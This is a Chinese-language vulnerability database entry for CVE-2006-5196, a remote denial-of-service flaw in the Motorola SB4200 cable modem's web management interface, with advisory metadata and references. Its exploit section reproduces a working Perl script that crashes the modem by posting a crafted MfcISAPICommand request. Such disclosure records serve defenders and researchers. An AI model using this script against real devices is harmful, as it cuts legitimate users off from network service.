Motorola SB4200 Web管理接口HTTP请求导致拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111184 漏洞类型 其他
发布时间 2006-10-03 更新时间 2006-10-16
CVE编号 CVE-2006-5196 CNNVD-ID CNNVD-200610-079
漏洞平台 Hardware CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/28739
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-079
|漏洞详情
MotorolaSB4200是一款即插即用的电缆调制解调器。SB4200的Web管理接口在处理用户请求时存在漏洞,远程攻击者可以通过发送将MfcISAPICommand参数设置为SecretProc的特定HTTP请求导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/20309/info

Motorola SB4200 is prone to a remote denial-of-service vulnerability.

This may permit an attacker to crash affected devices, denying further network services to legitimate users.

#!/usr/bin/perl -w
###################################################
# Remote Motorola SB4200 DoS attack.              #
# By Dave Gil.                                    # 
# Infosec Labs                                    #
###################################################

use strict; 
use HTTP::Request::Common qw (POST GET); 
use LWP::UserAgent; 
my $ua = LWP::UserAgent->new(); 
my $url = "http://192.168.100.1/"; 
my $req = $ua->post( $url, [MfcISAPICommand => 'SecretProc', Secret => 'A' x int rand(4000)]);

print "The DoS has been sent.";
exit();
|参考资料

来源:BID
名称:20309
链接:http://www.securityfocus.com/bid/20309
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/20309.pl
来源:XF
名称:motorola-surfboard-http-dos(29617)
链接:http://xforce.iss.net/xforce/xfdb/29617
来源:VUPEN
名称:ADV-2006-4054
链接:http://www.frsirt.com/english/advisories/2006/4054
来源:SECUNIA
名称:22359
链接:http://secunia.com/advisories/22359